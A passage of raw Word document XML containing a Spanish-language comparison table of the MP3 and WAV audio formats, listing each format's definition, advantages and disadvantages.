                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251709440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>5080</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>586854</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1143000" cy="1143000"/>
                  <wp:effectExtent l="0" t="0" r="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048" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="0031563E">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Llamado exactamente MPEG-1 Audio Layer 3, es una forma de codificar audio usando un algoritmo de compresión que genera pérdida de datos reduciendo la cantidad de información requerida para </w:t>
            </w:r>
            <w:r w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>representar una grabación de audio</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="0031563E">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>El formato MP3 (MPEG 1 Layer 3) fue creado por el Instituto Fraunhofer y por su extraordinario grado de compresión y alta calidad está prácticamente monopolizand</w:t>
            </w:r>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>o el mundo del audio digital.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Es ideal para publicar audios en la web. Se puede escuchar desde la mayoría de reproductores.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">La transformación de WAV a MP3 o la publicación directa de una grabación en formato MP3 es un proceso fácil y al alcance de los </w:t>
            </w:r>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>principales editores de audio.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Tiene un enorme nivel de compresión respecto al WAV. En igualdad del resto de condiciones reduciría el tamaño del archivo de un fragmento musical con un factor entre 1/10 y 1/12.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Presentan una mínima </w:t>
            </w:r>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>pérdida de calidad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Ya que tiene menos megabytes que un archivo normal de música, se puede fácilmente compartir con amigos, familiares etc…</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Es muy fácil de meter este tipo de formato en reproductores de música. (IPOD)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>El formato mp3 permite grabar sonidos en menos megabytes que un formato común d música.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Permite la distribución rápida y eficaz de la música.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Es un nuevo medio de comunicación y difusión de información, así como, por ejemplo: Podcasts</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Utiliza menos espacio que la </w:t>
            </w:r>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>canción original, o el archivo original.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3260" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00236265" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00236265">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">El formato MP3 causa que la gente ya no quiera comprar más CD porque se les es </w:t>
            </w:r>
            <w:r w:rsidR="0031563E" w:rsidRPr="00236265">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>más</w:t>
            </w:r>
            <w:r w:rsidRPr="00236265">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> fácil bajar música de internet y gratis</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>La calidad del sonido no es buena.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>El volumen a veces sube y baja y suena a estática.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Pérdida de calidad en todo el formato.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pierden información del audio, lo que causa la mala calidad de sonido.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Se pierden los derechos de autor.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00F211D9" w:rsidRDefault="00715745" w:rsidP="00F211D9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F211D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Es ilegal a veces por bajarla gratis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715745" w:rsidRPr="00C86F82" w:rsidTr="003A29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tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00C36E8B" w:rsidRDefault="00C36E8B" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C36E8B" w:rsidRDefault="00C36E8B" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C36E8B" w:rsidRDefault="00C36E8B" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C36E8B" w:rsidRDefault="00C36E8B" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C36E8B" w:rsidRDefault="00C36E8B" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>WAV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00C86F82">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-19050</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>856634</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1114425" cy="1436851"/>
                  <wp:effectExtent l="0" t="0" r="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114425" cy="1436851"/>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048" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00C36E8B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>El formato WAV (WaveForm Audio File) es un archivo que desarrolló originalmente Microsoft para guardar audio. Los archivos tienen extensión .wav</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00C36E8B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00C36E8B" w:rsidRDefault="00715745" w:rsidP="00C36E8B">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eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C36E8B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Es ideal para guardar audios originales a partir de los cuales se puede comprimir y guardar en distintos tamaños de muestreo para publicar en la web.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00C36E8B" w:rsidRDefault="00715745" w:rsidP="00C36E8B">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eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C36E8B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Es un formato de excelente calidad de audio.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00C36E8B" w:rsidRDefault="00715745" w:rsidP="00C36E8B">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eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C36E8B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Sin embargo, produce </w:t>
            </w:r>
            <w:r w:rsidRPr="00C36E8B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>archivos de un peso enorme. Una canción extraída de un CD (16 bytes, 44100 Hz y estéreo) puede ocupar entre 20 y 30 Mb.</w:t>
            </w:r>
          </w:p>
